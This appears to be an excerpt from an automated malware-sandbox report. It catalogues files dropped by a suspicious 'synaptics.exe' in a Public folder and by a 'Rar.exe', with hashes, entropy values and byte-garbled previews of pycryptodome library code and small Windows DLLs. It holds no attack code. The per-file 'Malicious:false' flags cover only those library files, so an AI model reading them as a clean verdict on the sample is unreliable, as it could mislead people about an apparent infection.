                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Pvykv8y2Ed5cPnd8Vr+jnH02x8yC0enZH3i2Ms+dlFKyXcfT7b2k1hITnSHWalQ7:cyC8N+n8yC0rsePJXOz29S7QGLm
                                                                                                                                                                                      MD5:95F8E2BC98EC330E708BC8C5A16B7640
                                                                                                                                                                                      SHA1:0B37DC5E3F10F7811D992490C32BD399944698E7
                                                                                                                                                                                      SHA-256:4E2572840DADCE022792A88CB93A0C494A37586ED52587AE95C5F44DD0CD5622
                                                                                                                                                                                      SHA-512:44FF2E8908E5D732B0E77F6607492B36B8A94745267B3C45A7D2F49501024B7C3023F9B1B8D00C000505ADB1DDA758E97001DD03B9F2E5FBA0F3AA14DC9F9103
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.%.......................@...sr...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...unhexlify)...bord..tobytes)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._BLAKE2sa..... int blake2s_init(void **state,. const uint8_t *key,. size_t key_size,. size_t digest_size);. int blake2s_destroy(void *state);. int blake2s_update(void *state,. const uint8_t *buf,. size_t len);. int blake2s_digest(const void *state,. uint8_t digest[32]);. int blake2s_copy(co
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7926
                                                                                                                                                                                      Entropy (8bit):5.384259307905337
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:xkzUGdR3AHmrFQCkRU3hoM2wis+jpxKmWBKskH3Pj:OzUGPQHmrFQJRUCM2wiZdxzPzXPj
                                                                                                                                                                                      MD5:959AEAF60AF2782B86D39472430AC396
                                                                                                                                                                                      SHA1:D7D28AC344BC3C7D490F633543AA1572F59E02B5
                                                                                                                                                                                      SHA-256:0A6EC7D6CA7734BFBF5A13B966D037D40E27839FB859722CA14649EA262F9C73
                                                                                                                                                                                      SHA-512:9F00F8ABEC214123D376A91BFB9AC25D0A1AEE4DE37FBC674C62A4F8FA36088B695E630678D6AB5D1011EDAF7AABD025DF82F5CED3813E95BDCEC74B25DC4FDE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f:*.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d.d...Z.G.d.d...d.e...Z.....d.d.d...Z.d.S.)......)...unhexlify)...BLAKE2s)...strxor)...long_to_bytes..bytes_to_long)...bord..tobytes.._copy_bytes)...get_random_bytesNc....................C...s,...t.|...d.>.|.A.}.t.|.t.|.....t.|.....d.....S.).N.....).r....r......len)...bsZ.xor_lsb..num..r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Hash\CMAC.py.._shift_bytes$...s........r....c....................@...sT...e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CMACz.A CMAC hash object.. Do not instantiate directly. Use the :func:`new` function... :ivar digest_size: the size in bytes of the resulting MAC tag. :vartype digest_size: integer. Nc....................C...sD...|.|._.t.d.d.|...|._.|.|._.|.|._.|.j...|._.}.d.|._.|.|._.|.d.k.r&d.}.d.|._.n.|.d.k.r0d.}.d.|._.n.t.d.|.......d.|...}.|.j.|.|.j.f.i
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6356
                                                                                                                                                                                      Entropy (8bit):5.473579203817209
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:HqnCPUNnFO1qs4mQ8UGLe57h6edAGJHFMxdO3vCqA2MwqQH3SzCFKK0MFBPhXC0I:2/Qzexh6JdtJtAJFPQ9
                                                                                                                                                                                      MD5:BC6C0A5FC43C5764BBCC122A05FEB5B0
                                                                                                                                                                                      SHA1:5357F9A80428E56F507A6E10DA2578201F89D7C1
                                                                                                                                                                                      SHA-256:EF668CAFA554F916DE568DE3850AD6E0790A4A3078049AFE3E5401A4FADED271
                                                                                                                                                                                      SHA-512:6267779DD8C27D617E72A8938F0DCA4728E93ACE3E541B77C054DCE159D559F3ECB3B4B75C57910B27F7C5A0E8447C62A3839A46818F1B58F644E57660224CC8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f. .......................@...s....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...e.....D...Z.G.d.d...d.e...Z.d.d.d...Z.d.S.)......)...bord..tobytes)...unhexlify)...BLAKE2s)...strxor)...get_random_bytes..new..HMACz.1.2.840.113549.2.7z.1.2.840.113549.2.8z.1.2.840.113549.2.9z.1.2.840.113549.2.10z.1.2.840.113549.2.11z.1.2.840.113549.2.12z.1.2.840.113549.2.13z.2.16.840.1.101.3.4.2.13z.2.16.840.1.101.3.4.2.14z.2.16.840.1.101.3.4.2.15z.2.16.840.1.101.3.4.2.16).z.1.3.14.3.2.26z.2.16.840.1.101.3.4.2.4z.2.16.840.1.101.3.4.2.1z.2.16.840.1.101.3.4.2.2z.2.16.840.1.101.3.4.2.3z.2.16.840.1.101.3.4.2.5z.2.16.840.1.101.3.4.2.6z.2.16.840.1.101.3.4.2.7z.2.16.840.1.101.3.4.2.8z.2.16.840.1.101.3.4.2.9z.2.16.840.1.101.3.4.2.10c....................C...s....i.|.].\.}.}.|.|...q.S...r....)....0..k..vr....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Hash\HMAC.py..<dictcomp>:...s......r....c....................@...sR...e.Z.d.Z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5410
                                                                                                                                                                                      Entropy (8bit):5.185991714871779
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:mbykvVEVoaG0Ed5cDlD1HkiM7wmZH3wmbOs6Q1/wQbya2qzgRlpXnFMNh:mhEZDkFbAQVwQPsRPA
                                                                                                                                                                                      MD5:7B387DCBE0FF64E66A0409F000C56E61
                                                                                                                                                                                      SHA1:BA8C434139D713B0C0082DE14B8D6A1B5EDBE18A
                                                                                                                                                                                      SHA-256:2C0732BC106CA9813C1502DE55611FBF86DBD287693E5E88916342C649A3BB2E
                                                                                                                                                                                      SHA-512:A16B53EAE40FA4B6F4D5A0D1BCE75B602A7087C330051F6B5EB77068AC0395B25264626FD8F6CC69FEADFC4B895B5970A88899DF33F1967C0F4B2C96F1DE5568
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sd...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.d.Z.d.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5433
                                                                                                                                                                                      Entropy (8bit):5.194071695945998
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:htykvm51RUT7NCaGuEd5SCjor1HcMM7AF8ZH3w7MbOs6IVFya28zTlpXJ1MB5:hc51RC7NrCErcTbAIVjXxU
                                                                                                                                                                                      MD5:FC054BC9F1832F75CDF00192E174C1E6
                                                                                                                                                                                      SHA1:C02759733E9A0222C5980564EB44A1AEE1983162
                                                                                                                                                                                      SHA-256:9CA8288E53E90F163F4311F8AF0675FA184C3A928B582F399EAA54BFE3620114
                                                                                                                                                                                      SHA-512:91E64791FD7D3E7C9B90448420DF429A6D9B1247D335980D120117A89B1DF4B9FD15B3F8522AE93DC2F8B966FA448C5678B1C922113232A871A09866643F1867
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sh...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5606
                                                                                                                                                                                      Entropy (8bit):5.182727877241171
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:rkykv4XXR6TJDkKGAEd5+i5c1HqO2NZH3Hb4fOs6viWkZLgz47MrxK:rhXXR8JD85cyj4fAvTWURK
                                                                                                                                                                                      MD5:93CC88C70E43F0ECF89A5B0EA38F65D2
                                                                                                                                                                                      SHA1:A4A5CD014DB0BD44D24AAA95989DCFD0DB16C4E1
                                                                                                                                                                                      SHA-256:16D8C6FFEE555B1C39A60862E5435EE2F14585E74076848E8EC8F95408878F69
                                                                                                                                                                                      SHA-512:37E0125A884F4DB590AD77CF512050EFACEFB84961A99AB685076297ED10EAD05A482168BDB1E1D37635506B7A8854A4F842EB5FB9AA8C1FB6EB889763A1A671
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sl...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA256a..... int SHA256_init(void **shaState);. int SHA256_destroy(void *shaState);. int SHA256_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA256_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA256_copy(const void *src, void *dst);.. int SHA256_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1705
                                                                                                                                                                                      Entropy (8bit):5.627938515362733
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZokzpHdkloLwZGD20+wMmqlZ6tB+BTIIIXII5p6:ZlHd/20uSz+BG4
                                                                                                                                                                                      MD5:36985553DC2BA7CF8FDDA194D8455F3F
                                                                                                                                                                                      SHA1:0349CC429634A6A22A16961D6DE5D6AEC711AA4F
                                                                                                                                                                                      SHA-256:95846B15BBFE015862ABEF226C2B0006595CF6830131E04FBD4CD6D36D0E41E7
                                                                                                                                                                                      SHA-512:58D888A284B0F2AA2EFE4AAEB1B1DD8710A9B780490CD4E3D61740FBF6D646363534D2136D13AAFF6A603CE1A27D32E607E376B64F1406A9650670757FB2C03F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....g.d...Z.d.d...Z.d.S.).)...HMACZ.MD2Z.MD4..MD5Z.RIPEMD160..SHA1..SHA224..SHA256..SHA384..SHA512..SHA3_224..SHA3_256..SHA3_384..SHA3_512Z.CMACZ.Poly1305Z.cSHAKE128Z.cSHAKE256Z.KMAC128Z.KMAC256Z.TupleHash128Z.TupleHash256Z.KangarooTwelveZ.TurboSHAKE128Z.TurboSHAKE256c....................C...sT...|.....}.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r<d.d.l.m.}...|.....S.|.d.v.rJd.d.l.m.}...|.....S.|.d.v.rZd.d.l.m.}...|.j.d.d...S.|.d.v.rjd.d.l.m.}...|.j.d.d...S.|.d.v.rxd.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.t.d.t.|.........).zKReturn a new hash instance, based on its name or. on its ASN.1 Object ID).z.1.3.14.3.2.26r....z.SHA-1.....).r....).z.2.16.840.1.101.3.4.2.4r....z.SHA-224).r....).z.2.16.840.1.101.3.4.2.1r....z.SHA-256).r....).z.2.16.840.1.101.3.4.2.2r....z.SHA-384).r....).z.2.16.840.1.101.3.4.2.3r....z.SHA-512).r....).z.2.16.840
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                      Entropy (8bit):5.39395207981322
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:TfUgdPEzpETBWctWJmIJjOjMdFmnEWGbZ3MVnjIN:bWpEv4JmAjOMnfbsnjS
                                                                                                                                                                                      MD5:D5B29442690A910A263AF7FD8B5395C4
                                                                                                                                                                                      SHA1:ED2D72881B5E73082757228A8756FB251690A819
                                                                                                                                                                                      SHA-256:B00EE3886A2EB216AB7DF2AC310EB20264C6F4B767A6AC024E05A38D84BF6EC4
                                                                                                                                                                                      SHA-512:EF1ABD19133A8CEE5592CEF8E488E231E093EEF8BE93AA08F57DCF7E8C08F0939706FA4F509E48D9F0DEDD9DC75639A3763191EDF89AB20D7E285F6E1791A6D3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.?.go..v...ao..(...`o..co..Bo..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.S.bo..Y..bo..Richco..................PE..L...5..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..\....1...............................0..@............0..t............................text...n........................... ..`.rdata.......0......................@..@.data........@......."..............@....rsrc........P.......$..............@..@.reloc..\....`.......&..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                      Entropy (8bit):5.458758161835021
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:/QlPEeRBuTpWc40WJ3zZjOd/2jmTCLIxn6x2MVn7INE:kRkHYJ3lj8+jmlxn6xBn7SE
                                                                                                                                                                                      MD5:2B341D7237DB72E7A60704D0B712CA9D
                                                                                                                                                                                      SHA1:D462476AFE982A8FFCCD03587B5AC8BAE31BB97A
                                                                                                                                                                                      SHA-256:E1F9D61FBA353964ADC8B06CDB705F2E5360235582B0FEEBA42A9EBFAAD6529A
                                                                                                                                                                                      SHA-512:DCE3B29F48DC737A1BF26CE6518DE298D1A8EC18BC852B30EDF54318968F7391814FFDDF1C0949A355FDDC1629B8F76845C47370EDA4759A968EAFBD869C87DA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i....R..i.......i......i...i...i.......i.......i.......i.......i.......i....>..i.......i..Rich.i..........................PE..L...5..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..H...p1...............................0..@............0..t............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..H....`.......(..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15360
                                                                                                                                                                                      Entropy (8bit):5.576864484095592
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:RGlc0JtjFWksnJ+MWi68KtH5O6qhXBinqRu:ec0lWksJ+M2HQ6qeqRu
                                                                                                                                                                                      MD5:3CD50F4CA53C3DC717F08CD25618FAB1
                                                                                                                                                                                      SHA1:756F0B5A62E80E4D999F4EC9C36420A261D33916
                                                                                                                                                                                      SHA-256:72E283A931115DEE425C298DB1E65298FC2680A6B5B8186163EC6EEB288C4D6A
                                                                                                                                                                                      SHA-512:09067010CCB4ED5EEA0C6CD2DF5505EFFAA44B8C2543B561FECDCCAD2D04499A2AF80D9D67732B1294915001D8F20C3724C7BAB800E2384AB697E1C1618D1FB8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L...4..e...........!...%.&..........N........@............................................@..........................E.......F..d....`.......................p......@B...............................A..@............@..|............................text....$.......&.................. ..`.rdata..,....@.......*..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......:..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                      Entropy (8bit):5.690196553690945
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:68hlPEXNImx4WcbWJ9awjOrXKQz8JUT8tpw8A4oTP54pMVnaKENm:YNImqiJfjUXKQwQepw8tkP54AnaKO
                                                                                                                                                                                      MD5:12498BD1E240FA76902E1EE89A391876
                                                                                                                                                                                      SHA1:B889B29F5624BD186803E32F9C89FF132D5CDE86
                                                                                                                                                                                      SHA-256:5118321B4AC0B2D8650910C22658939C5D1435502CD9168BB44C24530A413A04
                                                                                                                                                                                      SHA-512:A791FA69F5C9A48A75E57B598C73987635CF3EF3B6F3A660B70372672FD60B5798647BE79BDE8A3FE4AC4A2B6960AC88ADB8DA05388F471FC4E9AA356B6A12A4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........m..m..m...*.m.....m......m..m..m.....m.....m.....m....m....m...F.m....m..Rich.m..................PE..L...5..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..x...x1...............................0..@............0..|............................text............................... ..`.rdata..0....0....... ..............@..@.data...4....@.......*..............@....rsrc........P.......,..............@..@.reloc..x....`......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7137
                                                                                                                                                                                      Entropy (8bit):5.119608310082165
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:8qrskrs9t3q/IN27FJtmlrwdE0VpAZIBHx4fCbKXP:rrskrs9VqXUaHUZ2Rzb8
                                                                                                                                                                                      MD5:D47C57763FDA9057BE5F653CFFC76BD0
                                                                                                                                                                                      SHA1:3D758758AC5F98B04F317232FFD18D95CD62489C
                                                                                                                                                                                      SHA-256:B56FB5F5C5DB07C98967FD4CE110F55A970B8BBF4E69A1EE8072F09CB8C80484
                                                                                                                                                                                      SHA-512:8FC4559A0D9D3E63E11E63F2B5519BFF0F7BBF6F05057E2A6D0EF03F89EA7A3DE0E77D9E0DEB7677167A1454C97FF3C25BAAC3BE1F70DDB099E9F0C70C48D6E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Util/PEM.py : Privacy Enhanced Mail utilities..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):313
                                                                                                                                                                                      Entropy (8bit):4.63314311726341
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYBbAmV4uDbIBFeLBysOZ4fJEBd1pHWERrBFeLsEiJos:1REYBbr+uWFeLB/OifJEjv2EDFeLsEi5
                                                                                                                                                                                      MD5:107D6CC5B80CF3E12D074590F5D47AE5
                                                                                                                                                                                      SHA1:E89B8FCF239CD49A0CFC3D7561C783EA63E2FD19
                                                                                                                                                                                      SHA-256:FD17DE9B1D9EEB3950223BE5E5B16A8CA3EE0A7E4822557F0B882BFF3D67A1D0
                                                                                                                                                                                      SHA-512:B6E46F3846AFB5E59C5C6C1454FEEEC7FDAA01665F811BFE5338035A5D34CE16347F58EE9921118BEE11D73DE9A5CC56B2B5CC5257EF406D90E495DE3F0C0435
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Tuple, Optional, Callable....def encode(data: bytes,.. marke: str,... passphrase: Optional[bytes] = ...,... randfunc: Optional[Callable[[int],bytes]] = ...) -> str: .........def decode(pem_data: str,.. passphrase: Optional[bytes] = ...) -> Tuple[bytes, str, bool]: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8025
                                                                                                                                                                                      Entropy (8bit):4.947237016391909
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:/qrskrs9t3q/IXr6R3zH3ccW484YH/Y/bNoWN0+N:Srskrs9VqMry3rchXNQN56W
                                                                                                                                                                                      MD5:4ABCB64200E9782AFBB602C441B8FED2
                                                                                                                                                                                      SHA1:1697F19B9C8F5889DC8AFE00738026E1A0CAE2E8
                                                                                                                                                                                      SHA-256:9A1284B3DC17D008C7C88215C48F06370490883AFE1353838323FE519822FF6C
                                                                                                                                                                                      SHA-512:2BFB0D3709701A20380204293DD827101CF67F3D623D816B044FFD98ACED07E4EB6C08D5CD655353660929B238F01E7D546F687313B266611C8F5B638D55B829
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# PublicKey/PKCS8.py : PKCS#8 functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):617
                                                                                                                                                                                      Entropy (8bit):4.780296247881002
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBbr0mRE1BWS+EUe+LvjJMmxKxoIiNLojqyW38RJifJEvP5peYmrEidkLvFye:1REAYmC1X+u+/JMme4Loey1RMEnzurA/
                                                                                                                                                                                      MD5:F1EBC42749EE63F11F55A1DD77B38380
                                                                                                                                                                                      SHA1:9B592373655652EA3D08B222C68D62BED560C5E4
                                                                                                                                                                                      SHA-256:17C9A6398CEC2B74DF62786B9A84553ECFE8660DBFBEEC47663BBEF0EBD8E167
                                                                                                                                                                                      SHA-512:AB23620DF998CBB2519A67A272E12CA92C48167B1945DFE666C7E427BC3B9E3B6555130D04EF54A31639149A528A6F080B3220D28309E6E7D001274BB10C4A51
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Tuple, Optional, Union, Callable..from typing_extensions import NotRequired....from Crypto.Util.asn1 import DerObject..from Crypto.IO._PBES import ProtParams......def wrap(private_key: bytes,.. key_oid: str,.. passphrase: Union[bytes, str] = ...,.. protection: str = ...,.. prot_params: Optional[ProtParams] = ...,.. key_params: Optional[DerObject] = ...,.. randfunc: Optional[Callable[[int], str]] = ...) -> bytes: .........def unwrap(p8_private_key: bytes, passphrase: Optional[Union[bytes, str]] = ...) -> Tuple[str, bytes, Optional[bytes]]: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20477
                                                                                                                                                                                      Entropy (8bit):4.819602824795371
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:erskrs9VqYW+hS4ukVA1j6YBjBwB1vkcv8v54e9+vPzMN3DeY3H4VTZtw0AFtfzB:er6qYW+hTukVUDFm/8c0LeLMN3DeY3H7
                                                                                                                                                                                      MD5:02F77303FA09D2C06FD44036432DF876
                                                                                                                                                                                      SHA1:139E0DA6C67BC3CD75E000405E7BF92771F452C0
                                                                                                                                                                                      SHA-256:0F8CC06CA73276E22EA5AE445D936F6B2509B525D018FD4D7A3F5B12D2F70DC2
                                                                                                                                                                                      SHA-512:34379525C843BCC64E401B62CD8F295A8A29BED7CD2FD4C13B2EE550E6FCF586F244A5CC1D77990F08A08A07666B8A39231F1258F0AE2BAEDBFD63E7B695F732
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
